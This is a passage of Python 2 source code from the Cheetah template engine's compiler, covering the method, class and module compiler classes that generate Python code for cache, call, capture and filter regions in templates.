            self.addChunk(
                'raise TypeError("This method cannot be called with a trans arg")')
            self.dedent()

    def addPass(self, expr):
        self.addChunk(expr)

    def addDel(self, expr):
        self.addChunk(expr)

    def addAssert(self, expr):
        self.addChunk(expr)

    def addRaise(self, expr):
        self.addChunk(expr)

    def addBreak(self, expr):
        self.addChunk(expr)

    def addContinue(self, expr):
        self.addChunk(expr)

    def addPSP(self, PSP):
        """Emit a <% ... %> PSP block: '=' prefix means filtered output,
        'end' closes a block, a trailing '$' or ':' opens one."""
        self.commitStrConst()
        autoIndent = False
        if PSP[0] == '=':
            PSP = PSP[1:]
            if PSP:
                self.addWriteChunk('_filter(' + PSP + ')')
            return

        elif PSP.lower() == 'end':
            self.dedent()
            return
        elif PSP[-1] == '$':
            autoIndent = True
            PSP = PSP[:-1]
        elif PSP[-1] == ':':
            autoIndent = True

        for line in PSP.splitlines():
            self.addChunk(line)

        if autoIndent:
            self.indent()

    def nextCacheID(self):
        # Random id used to keep generated temp-variable names unique.
        return ('_'+str(random.randrange(100, 999))
                + str(random.randrange(10000, 99999)))

    def startCacheRegion(self, cacheInfo, lineCol, rawPlaceholder=None):
        """Open a #cache region: emit the cache lookup/refresh scaffolding and
        redirect writes into a DummyTransaction collector."""

        # @@TR: we should add some runtime logging to this

        ID = self.nextCacheID()
        interval = cacheInfo.get('interval',None)
        test = cacheInfo.get('test',None)
        customID = cacheInfo.get('id',None)
        if customID:
            ID = customID
        varyBy = cacheInfo.get('varyBy', repr(ID))
        self._cacheRegionsStack.append(ID) # attrib of current methodCompiler

        # @@TR: add this to a special class var as well
        self.addChunk('')

        self.addChunk('## START CACHE REGION: ID='+ID+
                      '. line %s, col %s'%lineCol + ' in the source.')

        self.addChunk('_RECACHE_%(ID)s = False'%locals())
        self.addChunk('_cacheRegion_%(ID)s = self.getCacheRegion(regionID='%locals()
                      + repr(ID)
                      + ', cacheInfo=%r'%cacheInfo
                      + ')')
        self.addChunk('if _cacheRegion_%(ID)s.isNew():'%locals())
        self.indent()
        self.addChunk('_RECACHE_%(ID)s = True'%locals())
        self.dedent()

        self.addChunk('_cacheItem_%(ID)s = _cacheRegion_%(ID)s.getCacheItem('%locals()
                      +varyBy+')')

        self.addChunk('if _cacheItem_%(ID)s.hasExpired():'%locals())
        self.indent()
        self.addChunk('_RECACHE_%(ID)s = True'%locals())
        self.dedent()

        if test:
            self.addChunk('if ' + test + ':')
            self.indent()
            self.addChunk('_RECACHE_%(ID)s = True'%locals())
            self.dedent()

        self.addChunk('if (not _RECACHE_%(ID)s) and _cacheItem_%(ID)s.getRefreshTime():'%locals())
        self.indent()
        #self.addChunk('print "DEBUG"+"-"*50')
        self.addChunk('try:')
        self.indent()
        self.addChunk('_output = _cacheItem_%(ID)s.renderOutput()'%locals())
        self.dedent()
        self.addChunk('except KeyError:')
        self.indent()
        self.addChunk('_RECACHE_%(ID)s = True'%locals())
        #self.addChunk('print "DEBUG"+"*"*50')
        self.dedent()
        self.addChunk('else:')
        self.indent()
        self.addWriteChunk('_output')
        self.addChunk('del _output')
        self.dedent()
        self.dedent()
        self.addChunk('if _RECACHE_%(ID)s or not _cacheItem_%(ID)s.getRefreshTime():'%locals())
        self.indent()
        self.addChunk('_orig_trans%(ID)s = trans'%locals())
        self.addChunk('trans = _cacheCollector_%(ID)s = DummyTransaction()'%locals())
        self.addChunk('write = _cacheCollector_%(ID)s.response().write'%locals())
        if interval:
            self.addChunk(("_cacheItem_%(ID)s.setExpiryTime(currentTime() +"%locals())
                          + str(interval) + ")")

    def endCacheRegion(self):
        """Close the innermost #cache region: restore trans/write, store the
        collected output in the cache item, and write it out."""
        ID = self._cacheRegionsStack.pop()
        self.addChunk('trans = _orig_trans%(ID)s'%locals())
        self.addChunk('write = trans.response().write')
        self.addChunk('_cacheData = _cacheCollector_%(ID)s.response().getvalue()'%locals())
        self.addChunk('_cacheItem_%(ID)s.setData(_cacheData)'%locals())
        self.addWriteChunk('_cacheData')
        self.addChunk('del _cacheData')
        self.addChunk('del _cacheCollector_%(ID)s'%locals())
        self.addChunk('del _orig_trans%(ID)s'%locals())
        self.dedent()
        self.addChunk('## END CACHE REGION: '+ID)
        self.addChunk('')

    def nextCallRegionID(self):
        return self.nextCacheID()

    def startCallRegion(self, functionName, args, lineCol, regionTitle='CALL'):
        """Open a #call region: buffer output into a DummyTransaction so it
        can be passed to `functionName` when the region ends."""
        class CallDetails: pass
        callDetails = CallDetails()
        callDetails.ID = ID = self.nextCallRegionID()
        callDetails.functionName = functionName
        callDetails.args = args
        callDetails.lineCol = lineCol
        callDetails.usesKeywordArgs = False
        self._callRegionsStack.append((ID, callDetails)) # attrib of current methodCompiler

        self.addChunk('## START %(regionTitle)s REGION: '%locals()
                      +ID
                      +' of '+functionName
                      +' at line %s, col %s'%lineCol + ' in the source.')
        self.addChunk('_orig_trans%(ID)s = trans'%locals())
        self.addChunk('_wasBuffering%(ID)s = self._CHEETAH__isBuffering'%locals())
        self.addChunk('self._CHEETAH__isBuffering = True')
        self.addChunk('trans = _callCollector%(ID)s = DummyTransaction()'%locals())
        self.addChunk('write = _callCollector%(ID)s.response().write'%locals())

    def setCallArg(self, argName, lineCol):
        """Start a named #arg within the current #call region; finishes the
        previous arg's collection if one was in progress."""
        ID, callDetails = self._callRegionsStack[-1]
        if callDetails.usesKeywordArgs:
            self._endCallArg()
        else:
            callDetails.usesKeywordArgs = True
            self.addChunk('_callKws%(ID)s = {}'%locals())
            self.addChunk('_currentCallArgname%(ID)s = %(argName)r'%locals())
        callDetails.currentArgname = argName

    def _endCallArg(self):
        # Store the collected output under the current arg name and start a
        # fresh collector for the next arg.
        ID, callDetails = self._callRegionsStack[-1]
        currCallArg = callDetails.currentArgname
        self.addChunk(('_callKws%(ID)s[%(currCallArg)r] ='
                       ' _callCollector%(ID)s.response().getvalue()')%locals())
        self.addChunk('del _callCollector%(ID)s'%locals())
        self.addChunk('trans = _callCollector%(ID)s = DummyTransaction()'%locals())
        self.addChunk('write = _callCollector%(ID)s.response().write'%locals())

    def endCallRegion(self, regionTitle='CALL'):
        """Close the innermost #call region: restore trans/write and invoke
        the target function with the buffered output (positionally or as
        keyword args, depending on whether #arg was used)."""
        ID, callDetails = self._callRegionsStack[-1]
        functionName, initialKwArgs, lineCol = (
            callDetails.functionName, callDetails.args, callDetails.lineCol)

        def reset(ID=ID):
            self.addChunk('trans = _orig_trans%(ID)s'%locals())
            self.addChunk('write = trans.response().write')
            self.addChunk('self._CHEETAH__isBuffering = _wasBuffering%(ID)s '%locals())
            self.addChunk('del _wasBuffering%(ID)s'%locals())
            self.addChunk('del _orig_trans%(ID)s'%locals())

        if not callDetails.usesKeywordArgs:
            reset()
            self.addChunk('_callArgVal%(ID)s = _callCollector%(ID)s.response().getvalue()'%locals())
            self.addChunk('del _callCollector%(ID)s'%locals())
            if initialKwArgs:
                initialKwArgs = ', '+initialKwArgs
            self.addFilteredChunk('%(functionName)s(_callArgVal%(ID)s%(initialKwArgs)s)'%locals())
            self.addChunk('del _callArgVal%(ID)s'%locals())
        else:
            if initialKwArgs:
                initialKwArgs = initialKwArgs+', '
            self._endCallArg()
            reset()
            self.addFilteredChunk('%(functionName)s(%(initialKwArgs)s**_callKws%(ID)s)'%locals())
            self.addChunk('del _callKws%(ID)s'%locals())
        self.addChunk('## END %(regionTitle)s REGION: '%locals()
                      +ID
                      +' of '+functionName
                      +' at line %s, col %s'%lineCol + ' in the source.')
        self.addChunk('')
        self._callRegionsStack.pop() # attrib of current methodCompiler

    def nextCaptureRegionID(self):
        return self.nextCacheID()

    def startCaptureRegion(self, assignTo, lineCol):
        """Open a #capture region: buffer output so it can later be assigned
        to `assignTo`."""
        class CaptureDetails: pass
        captureDetails = CaptureDetails()
        captureDetails.ID = ID = self.nextCaptureRegionID()
        captureDetails.assignTo = assignTo
        captureDetails.lineCol = lineCol
        self._captureRegionsStack.append((ID,captureDetails)) # attrib of current methodCompiler

        self.addChunk('## START CAPTURE REGION: '+ID
                      +' '+assignTo
                      +' at line %s, col %s'%lineCol + ' in the source.')
        self.addChunk('_orig_trans%(ID)s = trans'%locals())
        self.addChunk('_wasBuffering%(ID)s = self._CHEETAH__isBuffering'%locals())
        self.addChunk('self._CHEETAH__isBuffering = True')
        self.addChunk('trans = _captureCollector%(ID)s = DummyTransaction()'%locals())
        self.addChunk('write = _captureCollector%(ID)s.response().write'%locals())

    def endCaptureRegion(self):
        """Close the innermost #capture region and assign the buffered output
        to the target variable."""
        ID, captureDetails = self._captureRegionsStack.pop()
        assignTo, lineCol = (captureDetails.assignTo, captureDetails.lineCol)
        self.addChunk('trans = _orig_trans%(ID)s'%locals())
        self.addChunk('write = trans.response().write')
        self.addChunk('self._CHEETAH__isBuffering = _wasBuffering%(ID)s '%locals())
        self.addChunk('%(assignTo)s = _captureCollector%(ID)s.response().getvalue()'%locals())
        self.addChunk('del _orig_trans%(ID)s'%locals())
        self.addChunk('del _captureCollector%(ID)s'%locals())
        self.addChunk('del _wasBuffering%(ID)s'%locals())

    def setErrorCatcher(self, errorCatcherName):
        """Emit code that installs (and lazily constructs) the named
        ErrorCatcher on the template instance."""
        self.turnErrorCatcherOn()

        self.addChunk('if self._CHEETAH__errorCatchers.has_key("' + errorCatcherName + '"):')
        self.indent()
        self.addChunk('self._CHEETAH__errorCatcher = self._CHEETAH__errorCatchers["' +
                      errorCatcherName + '"]')
        self.dedent()
        self.addChunk('else:')
        self.indent()
        self.addChunk('self._CHEETAH__errorCatcher = self._CHEETAH__errorCatchers["'
                      + errorCatcherName + '"] = ErrorCatchers.'
                      + errorCatcherName + '(self)'
                      )
        self.dedent()

    def nextFilterRegionID(self):
        return self.nextCacheID()

    def setFilter(self, theFilter, isKlass):
        """Open a #filter region: swap _filter for the given filter class or
        named builtin filter, remembering the previous filter."""
        class FilterDetails: pass
        filterDetails = FilterDetails()
        filterDetails.ID = ID = self.nextFilterRegionID()
        filterDetails.theFilter = theFilter
        filterDetails.isKlass = isKlass
        self._filterRegionsStack.append((ID, filterDetails)) # attrib of current methodCompiler

        self.addChunk('_orig_filter%(ID)s = _filter'%locals())
        if isKlass:
            self.addChunk('_filter = self._CHEETAH__currentFilter = ' + theFilter.strip() +
                          '(self).filter')
        else:
            if theFilter.lower() == 'none':
                self.addChunk('_filter = self._CHEETAH__initialFilter')
            else:
                # is string representing the name of a builtin filter
                self.addChunk('filterName = ' + repr(theFilter))
                self.addChunk('if self._CHEETAH__filters.has_key("' + theFilter + '"):')
                self.indent()
                self.addChunk('_filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]')
                self.dedent()
                self.addChunk('else:')
                self.indent()
                self.addChunk('_filter = self._CHEETAH__currentFilter'
                              +' = \\\n\t\t\tself._CHEETAH__filters[filterName] = '
                              + 'getattr(self._CHEETAH__filtersLib, filterName)(self).filter')
                self.dedent()

    def closeFilterBlock(self):
        # Restore the filter that was active before the matching setFilter().
        ID, filterDetails = self._filterRegionsStack.pop()
        #self.addChunk('_filter = self._CHEETAH__initialFilter')
        self.addChunk('_filter = _orig_filter%(ID)s'%locals())
class AutoMethodCompiler(MethodCompiler):
    """MethodCompiler that wraps the template-author's method body in the
    standard Cheetah scaffolding: trans/_dummyTrans setup, `write`,
    searchList (`SL`) and `_filter` bindings, and the closing return of
    the buffered output.
    """

    def _setupState(self):
        MethodCompiler._setupState(self)
        # (argName, defaultValueSourceString-or-None) pairs, 'self' first
        self._argStringList = [ ("self",None) ]
        self._streamingEnabled = True

    def _useKWsDictArgForPassingTrans(self):
        """True if `trans` should be smuggled in via a **KWS dict rather
        than a named arg (never for the main 'respond' method)."""
        alreadyHasTransArg = [argname for argname,defval in self._argStringList
                              if argname=='trans']
        return (self.methodName()!='respond'
                and not alreadyHasTransArg
                and self.setting('useKWsDictArgForPassingTrans'))

    def cleanupState(self):
        """Finalize the method: close any open cache/call regions, decide how
        `trans` is passed, then wrap the body with auto setup/cleanup code."""
        MethodCompiler.cleanupState(self)
        self.commitStrConst()
        if self._cacheRegionsStack:
            self.endCacheRegion()
        if self._callRegionsStack:
            self.endCallRegion()

        if self._streamingEnabled:
            kwargsName = None
            positionalArgsListName = None
            for argname,defval in self._argStringList:
                if argname.strip().startswith('**'):
                    kwargsName = argname.strip().replace('**','')
                    break
                elif argname.strip().startswith('*'):
                    positionalArgsListName = argname.strip().replace('*','')
            if not kwargsName and self._useKWsDictArgForPassingTrans():
                kwargsName = 'KWS'
                self.addMethArg('**KWS', None)
            self._kwargsName = kwargsName

            if not self._useKWsDictArgForPassingTrans():
                if not kwargsName and not positionalArgsListName:
                    self.addMethArg('trans', 'None')
                else:
                    # can't safely add a `trans` arg after *args/**kwargs
                    self._streamingEnabled = False

        self._indentLev = self.setting('initialMethIndentLevel')
        # sandwich the author's body between the auto setup/cleanup chunks
        mainBodyChunks = self._methodBodyChunks
        self._methodBodyChunks = []
        self._addAutoSetupCode()
        self._methodBodyChunks.extend(mainBodyChunks)
        self._addAutoCleanupCode()

    def _addAutoSetupCode(self):
        """Emit the standard preamble: resolve `trans` (possibly a
        DummyTransaction), and bind `write`, `SL` and `_filter`."""
        if self._initialMethodComment:
            self.addChunk(self._initialMethodComment)

        if self._streamingEnabled:
            if self._useKWsDictArgForPassingTrans() and self._kwargsName:
                self.addChunk('trans = %s.get("trans")'%self._kwargsName)
            self.addChunk('if (not trans and not self._CHEETAH__isBuffering'
                          ' and not callable(self.transaction)):')
            self.indent()
            self.addChunk('trans = self.transaction'
                          ' # is None unless self.awake() was called')
            self.dedent()
            self.addChunk('if not trans:')
            self.indent()
            self.addChunk('trans = DummyTransaction()')
            if self.setting('autoAssignDummyTransactionToSelf'):
                self.addChunk('self.transaction = trans')
            self.addChunk('_dummyTrans = True')
            self.dedent()
            self.addChunk('else: _dummyTrans = False')
        else:
            self.addChunk('trans = DummyTransaction()')
            self.addChunk('_dummyTrans = True')
        self.addChunk('write = trans.response().write')
        if self.setting('useNameMapper'):
            argNames = [arg[0] for arg in self._argStringList]
            allowSearchListAsMethArg = self.setting('allowSearchListAsMethArg')
            if allowSearchListAsMethArg and 'SL' in argNames:
                pass
            elif allowSearchListAsMethArg and 'searchList' in argNames:
                self.addChunk('SL = searchList')
            else:
                self.addChunk('SL = self._CHEETAH__searchList')
        if self.setting('useFilters'):
            self.addChunk('_filter = self._CHEETAH__currentFilter')
        self.addChunk('')
        self.addChunk("#" *40)
        self.addChunk('## START - generated method body')
        self.addChunk('')

    def _addAutoCleanupCode(self):
        """Emit the standard epilogue; generators skip the return stop."""
        self.addChunk('')
        self.addChunk("#" *40)
        self.addChunk('## END - generated method body')
        self.addChunk('')
        if not self._isGenerator:
            self.addStop()
        self.addChunk('')

    def addStop(self, expr=None):
        # `expr` is unused here but part of the MethodCompiler interface
        self.addChunk('return _dummyTrans and trans.response().getvalue() or ""')

    def addMethArg(self, name, defVal=None):
        """Append (name, defaultValueSource) to the method's arg list."""
        self._argStringList.append( (name,defVal) )

    def methodSignature(self):
        """Render the full `def name(args):` line, with decorator if any."""
        argStringChunks = []
        for arg in self._argStringList:
            chunk = arg[0]
            if arg[1] is not None:  # fixed: was `not arg[1] == None`
                chunk += '=' + arg[1]
            argStringChunks.append(chunk)
        argString = (', ').join(argStringChunks)

        output = []
        if self._decorator:
            output.append(self._indent + self._decorator+'\n')
        output.append(self._indent + "def "
                      + self.methodName() + "(" +
                      argString + "):\n\n")
        return ''.join(output)
##################################################
## CLASS COMPILERS
_initMethod_initCheetah = """\
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
""".replace('\n','\n'+' '*8)
class ClassCompiler(GenUtils):
    """Compiles one template class: collects MethodCompilers, generated
    attributes and class-docstring lines, then renders the complete
    `class` block via wrapClassDef().
    """
    methodCompilerClass = AutoMethodCompiler
    methodCompilerClassForInit = MethodCompiler

    def __init__(self, className, mainMethodName='respond',
                 moduleCompiler=None,
                 fileName=None,
                 settingsManager=None):
        self._settingsManager = settingsManager
        self._fileName = fileName
        self._className = className
        self._moduleCompiler = moduleCompiler
        self._mainMethodName = mainMethodName
        self._setupState()
        methodCompiler = self._spawnMethodCompiler(
            mainMethodName,
            initialMethodComment='## CHEETAH: main method generated for this template')
        self._setActiveMethodCompiler(methodCompiler)
        if fileName and self.setting('monitorSrcFile'):
            self._addSourceFileMonitoring(fileName)

    def setting(self, key):
        """Look a compiler setting up on the shared settings manager."""
        return self._settingsManager.setting(key)

    def __getattr__(self, name):
        """Provide access to the methods and attributes of the MethodCompiler
        at the top of the activeMethods stack: one-way namespace sharing

        WARNING: Use .setMethods to assign the attributes of the MethodCompiler
        from the methods of this class!!! or you will be assigning to attributes
        of this object instead."""
        if name in self.__dict__:
            return self.__dict__[name]
        elif hasattr(self.__class__, name):
            return getattr(self.__class__, name)
        elif self._activeMethodsList and hasattr(self._activeMethodsList[-1], name):
            return getattr(self._activeMethodsList[-1], name)
        else:
            # fixed: was Py2-only `raise AttributeError, name`
            raise AttributeError(name)

    def _setupState(self):
        self._classDef = None
        self._decoratorForNextMethod = None
        self._activeMethodsList = []        # stack while parsing/generating
        self._finishedMethodsList = []      # store by order
        self._methodsIndex = {}      # store by name
        self._baseClass = 'Template'
        self._classDocStringLines = []
        # printed after methods in the gen class def:
        self._generatedAttribs = ['_CHEETAH__instanceInitialized = False']
        self._generatedAttribs.append('_CHEETAH_version = __CHEETAH_version__')
        self._generatedAttribs.append(
            '_CHEETAH_versionTuple = __CHEETAH_versionTuple__')
        self._generatedAttribs.append('_CHEETAH_genTime = __CHEETAH_genTime__')
        self._generatedAttribs.append('_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__')
        self._generatedAttribs.append('_CHEETAH_src = __CHEETAH_src__')
        self._generatedAttribs.append(
            '_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__')

        if self.setting('templateMetaclass'):
            self._generatedAttribs.append('__metaclass__ = '+self.setting('templateMetaclass'))
        self._initMethChunks = []
        self._blockMetaData = {}
        self._errorCatcherCount = 0
        self._placeholderToErrorCatcherMap = {}

    def cleanupState(self):
        """Close all open methods, build __init__, and register the main
        method reference attribute."""
        while self._activeMethodsList:
            methCompiler = self._popActiveMethodCompiler()
            self._swallowMethodCompiler(methCompiler)
        self._setupInitMethod()
        if self._mainMethodName == 'respond':
            if self.setting('setup__str__method'):
                self._generatedAttribs.append('def __str__(self): return self.respond()')
        self.addAttribute('_mainCheetahMethod_for_' + self._className +
                           '= ' + repr(self._mainMethodName) )

    def _setupInitMethod(self):
        """Generate __init__ from the accumulated init chunks and place it
        first in the finished-methods list."""
        __init__ = self._spawnMethodCompiler('__init__',
                                             klass=self.methodCompilerClassForInit)
        __init__.setMethodSignature("def __init__(self, *args, **KWs)")
        __init__.addChunk("%s.__init__(self, *args, **KWs)" % self._baseClass)
        __init__.addChunk(_initMethod_initCheetah%{'className':self._className})
        for chunk in self._initMethChunks:
            __init__.addChunk(chunk)
        __init__.cleanupState()
        self._swallowMethodCompiler(__init__, pos=0)

    def _addSourceFileMonitoring(self, fileName):
        """Emit code that recompiles the template when its source file
        changes on disk."""
        # @@TR: this stuff needs auditing for Cheetah 2.0
        # the first bit is added to init
        self.addChunkToInit('self._filePath = ' + repr(fileName))
        self.addChunkToInit('self._fileMtime = ' + str(getmtime(fileName)) )

        # the rest is added to the main output method of the class ('mainMethod')
        self.addChunk('if exists(self._filePath) and ' +
                      'getmtime(self._filePath) > self._fileMtime:')
        self.indent()
        # BUGFIX: this line previously referenced an undefined name
        # `className` (NameError whenever monitorSrcFile was enabled);
        # the generated code needs the class name as a string literal.
        self.addChunk('self._compile(file=self._filePath, moduleName=' +
                      repr(self._className) + ')')
        self.addChunk(
            'write(getattr(self, self._mainCheetahMethod_for_' + self._className +
            ')(trans=trans))')
        self.addStop()
        self.dedent()

    def setClassName(self, name):
        self._className = name

    def className(self):
        return self._className

    def setBaseClass(self, baseClassName):
        self._baseClass = baseClassName

    def setMainMethodName(self, methodName):
        """Rename the main method, updating the index and any generated
        file-monitoring code that calls it by name."""
        if methodName == self._mainMethodName:
            return
        ## change the name in the methodCompiler and add new reference
        mainMethod = self._methodsIndex[self._mainMethodName]
        mainMethod.setMethodName(methodName)
        self._methodsIndex[methodName] = mainMethod

        ## make sure that fileUpdate code still works properly:
        chunkToChange = ('write(self.' + self._mainMethodName + '(trans=trans))')
        chunks = mainMethod._methodBodyChunks
        if chunkToChange in chunks:
            for i in range(len(chunks)):
                if chunks[i] == chunkToChange:
                    chunks[i] = ('write(self.' + methodName + '(trans=trans))')
        ## get rid of the old reference and update self._mainMethodName
        del self._methodsIndex[self._mainMethodName]
        self._mainMethodName = methodName

    def setMainMethodArgs(self, argsList):
        mainMethodCompiler = self._methodsIndex[self._mainMethodName]
        for argName, defVal in argsList:
            mainMethodCompiler.addMethArg(argName, defVal)

    def _spawnMethodCompiler(self, methodName, klass=None,
                             initialMethodComment=None):
        """Create (and index) a new MethodCompiler, consuming any pending
        decorator set via addDecorator()."""
        if klass is None:
            klass = self.methodCompilerClass

        decorator = None
        if self._decoratorForNextMethod:
            decorator = self._decoratorForNextMethod
            self._decoratorForNextMethod = None
        methodCompiler = klass(methodName, classCompiler=self,
                               decorator=decorator,
                               initialMethodComment=initialMethodComment)
        self._methodsIndex[methodName] = methodCompiler
        return methodCompiler

    def _setActiveMethodCompiler(self, methodCompiler):
        self._activeMethodsList.append(methodCompiler)

    def _getActiveMethodCompiler(self):
        return self._activeMethodsList[-1]

    def _popActiveMethodCompiler(self):
        return self._activeMethodsList.pop()

    def _swallowMethodCompiler(self, methodCompiler, pos=None):
        """Finalize a method and append (or insert) it into the finished list."""
        methodCompiler.cleanupState()
        if pos is None:  # fixed: was `pos==None`
            self._finishedMethodsList.append( methodCompiler )
        else:
            self._finishedMethodsList.insert(pos, methodCompiler)
        return methodCompiler

    def startMethodDef(self, methodName, argsList, parserComment):
        methodCompiler = self._spawnMethodCompiler(
            methodName, initialMethodComment=parserComment)
        self._setActiveMethodCompiler(methodCompiler)
        for argName, defVal in argsList:
            methodCompiler.addMethArg(argName, defVal)

    def _finishedMethods(self):
        return self._finishedMethodsList

    def addDecorator(self, decoratorExpr):
        """Set the decorator to be used with the next method in the source.

        See _spawnMethodCompiler() and MethodCompiler for the details of how
        this is used.
        """
        self._decoratorForNextMethod = decoratorExpr

    def addClassDocString(self, line):
        # escape % so the later %-interpolation of the docstring is safe
        self._classDocStringLines.append( line.replace('%','%%'))

    def addChunkToInit(self,chunk):
        self._initMethChunks.append(chunk)

    def addAttribute(self, attribExpr):
        """Add a class attribute assignment (from the #attr directive)."""
        ## first test to make sure that the user hasn't used any fancy Cheetah syntax
        #  (placeholders, directives, etc.) inside the expression
        if attribExpr.find('VFN(') != -1 or attribExpr.find('VFFSL(') != -1:
            raise ParseError(self,
                             'Invalid #attr directive.' +
                             ' It should only contain simple Python literals.')
        ## now add the attribute
        self._generatedAttribs.append(attribExpr)

    def addErrorCatcherCall(self, codeChunk, rawCode='', lineCol=''):
        """Generate (or reuse) a hidden method that evaluates `codeChunk`
        under the template's ErrorCatcher; returns the method's name."""
        if rawCode in self._placeholderToErrorCatcherMap:
            methodName = self._placeholderToErrorCatcherMap[rawCode]
            if not self.setting('outputRowColComments'):
                self._methodsIndex[methodName].addMethDocString(
                    'plus at line %s, col %s'%lineCol)
            return methodName

        self._errorCatcherCount += 1
        methodName = '__errorCatcher' + str(self._errorCatcherCount)
        self._placeholderToErrorCatcherMap[rawCode] = methodName

        catcherMeth = self._spawnMethodCompiler(
            methodName,
            klass=MethodCompiler,
            initialMethodComment=('## CHEETAH: Generated from ' + rawCode +
                                  ' at line %s, col %s'%lineCol + '.')
            )
        catcherMeth.setMethodSignature('def ' + methodName +
                                       '(self, localsDict={})')
                                        # is this use of localsDict right?
        catcherMeth.addChunk('try:')
        catcherMeth.indent()
        catcherMeth.addChunk("return eval('''" + codeChunk +
                             "''', globals(), localsDict)")
        catcherMeth.dedent()
        catcherMeth.addChunk('except self._CHEETAH__errorCatcher.exceptions(), e:')
        catcherMeth.indent()
        catcherMeth.addChunk("return self._CHEETAH__errorCatcher.warn(exc_val=e, code= " +
                             repr(codeChunk) + " , rawCode= " +
                             repr(rawCode) + " , lineCol=" + str(lineCol) +")")

        catcherMeth.cleanupState()

        self._swallowMethodCompiler(catcherMeth)
        return methodName

    def closeDef(self):
        self.commitStrConst()
        methCompiler = self._popActiveMethodCompiler()
        self._swallowMethodCompiler(methCompiler)

    def closeBlock(self):
        """Close a #block: finish its method and emit the call to it."""
        self.commitStrConst()
        methCompiler = self._popActiveMethodCompiler()
        methodName = methCompiler.methodName()
        if self.setting('includeBlockMarkers'):
            endMarker = self.setting('blockMarkerEnd')
            methCompiler.addStrConst(endMarker[0] + methodName + endMarker[1])
        self._swallowMethodCompiler(methCompiler)

        #metaData = self._blockMetaData[methodName]
        #rawDirective = metaData['raw']
        #lineCol = metaData['lineCol']

        ## insert the code to call the block, caching if #cache directive is on
        codeChunk = 'self.' + methodName + '(trans=trans)'
        self.addChunk(codeChunk)

        #self.appendToPrevChunk(' # generated from ' + repr(rawDirective) )
        #if self.setting('outputRowColComments'):
        #    self.appendToPrevChunk(' at line %s, col %s' % lineCol + '.')

    ## code wrapping methods

    def classDef(self):
        if self._classDef:
            return self._classDef
        else:
            return self.wrapClassDef()

    __str__ = classDef

    def wrapClassDef(self):
        """Assemble the full class definition text: signature, docstring,
        then methods/attributes in the configured order."""
        ind = self.setting('indentationStep')
        classDefChunks = [self.classSignature(),
                          self.classDocstring(),
                          ]
        def addMethods():
            classDefChunks.extend([
                ind + '#'*50,
                ind + '## CHEETAH GENERATED METHODS',
                '\n',
                self.methodDefs(),
                ])
        def addAttributes():
            classDefChunks.extend([
                ind + '#'*50,
                ind + '## CHEETAH GENERATED ATTRIBUTES',
                '\n',
                self.attributes(),
                ])
        if self.setting('outputMethodsBeforeAttributes'):
            addMethods()
            addAttributes()
        else:
            addAttributes()
            addMethods()

        classDef = '\n'.join(classDefChunks)
        self._classDef = classDef
        return classDef

    def classSignature(self):
        return "class %s(%s):" % (self.className(), self._baseClass)

    def classDocstring(self):
        if not self._classDocStringLines:
            return ''
        ind = self.setting('indentationStep')
        docStr = ('%(ind)s"""\n%(ind)s' +
                  '\n%(ind)s'.join(self._classDocStringLines) +
                  '\n%(ind)s"""\n'
                  ) % {'ind':ind}
        return  docStr

    def methodDefs(self):
        methodDefs = [str(methGen) for methGen in self._finishedMethods() ]
        return '\n\n'.join(methodDefs)

    def attributes(self):
        attribs = [self.setting('indentationStep') + str(attrib)
                      for attrib in self._generatedAttribs ]
        return '\n\n'.join(attribs)
class AutoClassCompiler(ClassCompiler):
    # Placeholder subclass: the hook point for customizing class compilation.
    pass
##################################################
## MODULE COMPILERS
class ModuleCompiler(SettingsManager, GenUtils):
    """Compiles a Cheetah template (source string or file) into the text of
    a complete Python module: shbang + encoding line, imports, module
    constants, special vars, the generated class(es) and a command-line
    footer.

    NOTE(review): this code targets Python 2 (``types.StringType``,
    ``unicode``, ``has_key``, ``raise E, v``); it will not run unmodified
    on Python 3.
    """

    parserClass = Parser
    classCompilerClass = AutoClassCompiler

    def __init__(self, source=None, file=None,
                 moduleName='DynamicallyCompiledCheetahTemplate',
                 mainClassName=None, # string
                 mainMethodName=None, # string
                 baseclassName=None, # string
                 extraImportStatements=None, # list of strings
                 settings=None # dict
                 ):
        # NOTE(review): extraImportStatements is accepted but never used in
        # this method -- confirm whether callers rely on it.
        SettingsManager.__init__(self)
        if settings:
            self.updateSettings(settings)
        # disable useStackFrames if the C version of NameMapper isn't compiled
        # it's painfully slow in the Python version and bites Windows users all
        # the time:
        if not NameMapper.C_VERSION:
            if not sys.platform.startswith('java'):
                warnings.warn(
                    "\nYou don't have the C version of NameMapper installed! "
                    "I'm disabling Cheetah's useStackFrames option as it is "
                    "painfully slow with the Python version of NameMapper. "
                    "You should get a copy of Cheetah with the compiled C version of NameMapper."
                    )
            self.setSetting('useStackFrames', False)

        self._compiled = False
        self._moduleName = moduleName
        if not mainClassName:
            self._mainClassName = moduleName
        else:
            self._mainClassName = mainClassName
        self._mainMethodNameArg = mainMethodName
        if mainMethodName:
            self.setSetting('mainMethodName', mainMethodName)
        self._baseclassName = baseclassName

        self._filePath = None
        self._fileMtime = None

        if source and file:
            raise TypeError("Cannot compile from a source string AND file.")
        elif isinstance(file, types.StringType) or isinstance(file, types.UnicodeType): # it's a filename.
            f = open(file) # Raises IOError.
            source = f.read()
            f.close()
            self._filePath = file
            self._fileMtime = os.path.getmtime(file)
        elif hasattr(file, 'read'):
            source = file.read() # Can't set filename or mtime--they're not accessible.
        elif file:
            raise TypeError("'file' argument must be a filename string or file-like object")

        if self._filePath:
            self._fileDirName, self._fileBaseName = os.path.split(self._filePath)
            self._fileBaseNameRoot, self._fileBaseNameExt = \
                os.path.splitext(self._fileBaseName)

        if not (isinstance(source, str) or isinstance(source, unicode)):
            source = str( source )
        # by converting to string here we allow objects such as other Templates
        # to be passed in

        # Handle the #indent directive by converting it to other directives.
        # (Over the long term we'll make it a real directive.)
        if source == "":
            warnings.warn("You supplied an empty string for the source!", )

        if source.find('#indent') != -1: #@@TR: undocumented hack
            source = indentize(source)

        self._parser = self.parserClass(source, filename=self._filePath, compiler=self)
        self._setupCompilerState()

    def __getattr__(self, name):
        """Provide one-way access to the methods and attributes of the
        ClassCompiler, and thereby the MethodCompilers as well.

        WARNING: Use .setMethods to assign the attributes of the ClassCompiler
        from the methods of this class!!! or you will be assigning to attributes
        of this object instead.
        """
